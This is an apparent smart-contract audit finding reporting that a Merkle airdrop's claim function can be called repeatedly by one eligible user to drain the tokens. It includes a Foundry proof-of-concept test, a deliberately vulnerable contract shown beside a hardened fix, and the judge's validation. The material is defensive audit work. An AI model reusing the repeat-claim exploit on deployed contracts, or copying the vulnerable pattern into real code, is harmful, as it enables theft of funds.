Submission Details
Severity: high
Valid

Eligible user can claim the airdrop more than once, until no tokens are left

Description: The function MerkleAirdrop::claim can be called by an eligible user more than once. The intention
of this function is to let a user claim their allocation after Merkle-tree validation, but after the tokens have been sent,
the same user can call it again and again, with the same proof, until there are no tokens left in the contract.

Impact: Money can be drained just by one eligible user.

Proof of Concept: Below is a test that you can add to MerkleAirdropTest.t.sol and run.
The test calls the claim function twice with the same user; only one payout should be possible, but
both claim calls succeed and the user ends up with twice the allocated amount.

  1. Add this test to the test Solidity file

```solidity
// Uses the fixtures already defined in MerkleAirdropTest.t.sol:
// token, airdrop, collectorOne, amountToCollect and proof.
function testUsersCanClaimMultipleTimes() public {
    uint256 startingBalance = token.balanceOf(collectorOne);
    // Fund the user with enough ETH to pay the claim fee twice.
    vm.deal(collectorOne, airdrop.getFee() * 2);

    // First claim: expected to succeed.
    vm.startPrank(collectorOne);
    airdrop.claim{value: airdrop.getFee()}(
        collectorOne,
        amountToCollect,
        proof
    );
    vm.stopPrank();

    // Second claim with the very same proof: should revert, but does not.
    vm.startPrank(collectorOne);
    airdrop.claim{value: airdrop.getFee()}(
        collectorOne,
        amountToCollect,
        proof
    );
    vm.stopPrank();

    uint256 endingBalance = token.balanceOf(collectorOne);
    // The user received the allocation twice.
    assertEq(endingBalance - startingBalance, amountToCollect * 2);
}
```

  2. Run this command

```shell
forge test
```

Recommended mitigation: Protect the claim function so that each eligible user can claim only once, by recording successful claims and rejecting any further call for the same user.
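The following is an added illustration of that mitigation; it is not the First Flight's MerkleAirdrop.sol and its contract names, storage layout and leaf encoding are assumptions. It places the vulnerable pattern (proof verified, tokens sent, nothing recorded) beside a hardened version that keeps a `hasClaimed` mapping and marks the claim as consumed before the token transfer. It assumes OpenZeppelin contracts are installed and remapped under `@openzeppelin/`.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example, not the audited project's code. Assumes OpenZeppelin is available
// via the "@openzeppelin/" remapping (forge install OpenZeppelin/openzeppelin-contracts).
import {MerkleProof} from "@openzeppelin/contracts/utils/cryptography/MerkleProof.sol";
import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {SafeERC20} from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";

/// @dev The pattern behind the finding: the proof is checked and tokens are sent, but
///      nothing records that this leaf has been used, so the same (account, amount, proof)
///      tuple verifies again on every call until the contract balance is empty.
contract VulnerableAirdrop {
    using SafeERC20 for IERC20;

    bytes32 public immutable merkleRoot;
    IERC20 public immutable token;

    constructor(bytes32 _merkleRoot, IERC20 _token) {
        merkleRoot = _merkleRoot;
        token = _token;
    }

    function claim(address account, uint256 amount, bytes32[] calldata proof) external {
        // Assumed leaf encoding (double-hashed to avoid second-preimage issues).
        bytes32 leaf = keccak256(bytes.concat(keccak256(abi.encode(account, amount))));
        require(MerkleProof.verify(proof, merkleRoot, leaf), "invalid proof");
        token.safeTransfer(account, amount); // nothing stops a repeat call
    }
}

/// @dev Hardened version: one successful claim per account, recorded before the transfer.
contract FixedAirdrop {
    using SafeERC20 for IERC20;

    bytes32 public immutable merkleRoot;
    IERC20 public immutable token;
    mapping(address => bool) public hasClaimed;

    event Claimed(address indexed account, uint256 amount);
    error AlreadyClaimed(address account);
    error InvalidProof();

    constructor(bytes32 _merkleRoot, IERC20 _token) {
        merkleRoot = _merkleRoot;
        token = _token;
    }

    function claim(address account, uint256 amount, bytes32[] calldata proof) external {
        // Check: reject any account that has already been paid out.
        if (hasClaimed[account]) revert AlreadyClaimed(account);

        bytes32 leaf = keccak256(bytes.concat(keccak256(abi.encode(account, amount))));
        if (!MerkleProof.verify(proof, merkleRoot, leaf)) revert InvalidProof();

        // Effect: record the claim before any external call (checks-effects-interactions),
        // so a reentrant or repeated call sees the updated state.
        hasClaimed[account] = true;
        emit Claimed(account, amount);

        // Interaction: pay out exactly once.
        token.safeTransfer(account, amount);
    }
}
```

With this change the proof-of-concept test above would revert on the second `claim` with `AlreadyClaimed`, and a Foundry test can assert that with `vm.expectRevert`. The mapping is keyed by account because the mitigation calls for one claim per user; if a tree is allowed to contain several leaves for the same address, key the mapping by the leaf hash instead so each allocation is consumed independently.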

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

multi-claim-airdrop
